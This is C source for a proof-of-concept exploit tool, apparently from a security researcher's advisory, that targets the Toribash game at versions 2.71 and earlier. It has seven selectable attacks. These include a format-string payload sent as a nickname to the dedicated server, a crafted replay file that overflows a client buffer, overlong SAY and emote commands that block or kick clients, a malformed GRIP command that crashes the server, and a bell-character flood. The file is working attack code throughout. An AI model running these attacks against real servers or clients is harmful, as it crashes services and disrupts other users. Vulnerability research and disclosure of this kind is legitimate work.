/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif



#define VER         "0.1"
#define PORT        20184
#define ATTACK2     "toribashish.rpl"

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



int lf_recv(int sd, u8 *buff, int buffsz);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    FILE    *fd;
    int     sd,
            i,
            len,
            attack;
    u16     port    = PORT;
    u8      buff[4096 + 1]; // the max

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Toribash <= 2.71 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attack:\n"
            " 1 = dedicated server format string\n"
            " 2 = client commands buffer-overflow\n"
            "     <host> is ignored, the tool will generate the file %s\n"
            " 3 = client unicode buffer-overflow in the SAY command\n"
            " 4 = server crash through uninitialized values\n"
            " 5 = line-feed dropping\n"
            " 6 = Windows dedicated server hell bell\n"
            " 7 = clients kicked by malformed packet\n"
            "\n", argv[0], port, ATTACK2);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(attack == 2) {
        printf("- create file %s\n", ATTACK2);
        fd = fopen(ATTACK2, "wb");
        if(!fd) std_err();

        fprintf(fd, "#!/usr/bin/toribash\n");

        memset(buff, 'A', 600);
        buff[600] = 0;
        fprintf(fd, "%s\n", buff);

        fclose(fd);
        printf(
            "- file has been created, now place it in the replay folder, launch the game\n"
            "  and select it\n");
        return(0);
    }

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf("ok\n");

    if(lf_recv(sd, buff, 4096) > 0) {
        printf("  %s\n", buff);
    }

    if(attack == 1) {
        len = sprintf(buff, "NICK %%n%%n%%n%%n%%s%%s%%s%%s%%s\n");
        printf("- send %s", buff);
        send(sd, buff, len, 0);

        len = sprintf(buff, "ENTER\n");
        printf("- send %s", buff);
        send(sd, buff, len, 0);

    } else if((attack == 3) || (attack == 5)) {
        len = 512;
        memset(buff, 'A', len);
        memcpy(buff, "SAY ", 4);
        buff[len - 1] = '\n';
        printf("- send long SAY command for blocking clients\n");
        send(sd, buff, len, 0);
        if(attack == 3) send(sd, buff, len, 0);

    } else if(attack == 4) {
        len = sprintf(buff, "GRIP -1;0 0\n");
        printf("- send %s", buff);
        send(sd, buff, len, 0);

    } else if(attack == 6) {
        len = 4096;
        memset(buff, 0x07, len);
        buff[len - 1] = '\n';
        printf("- send tons of bells (works only versus Windows dedicated server)\n");
        send(sd, buff, len, 0);

    } else if(attack == 7) {
        len = sprintf(buff, "ENTER\n");
        printf("- send %s", buff);
        send(sd, buff, len, 0);

        len = 4096;
        memset(buff, 'A', len);
        memcpy(buff, "emote ", 6);
        buff[len - 1] = '\n';
        printf("- send long emote command\n");
        send(sd, buff, len, 0);
    }

    for(i = 0; i < 5; i++) {
        len = recv(sd, buff, 4096, 0);
        if(len < 0) std_err();
        if(!len) break;
        buff[len] = 0;
        printf("  %s\n", buff);
    }

    close(sd);

    printf("- done\n");
    return(0);
}



int lf_recv(int sd, u8 *buff, int buffsz) {
    int     t,
            len;

    for(len = 0; len < buffsz; len++) {
        t = recv(sd, buff + len, 1, 0);
        if(t < 0) std_err();
        if(!t) break;
        if(buff[len] == '\n') break;
    }
    buff[len] = 0;

    return(len);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


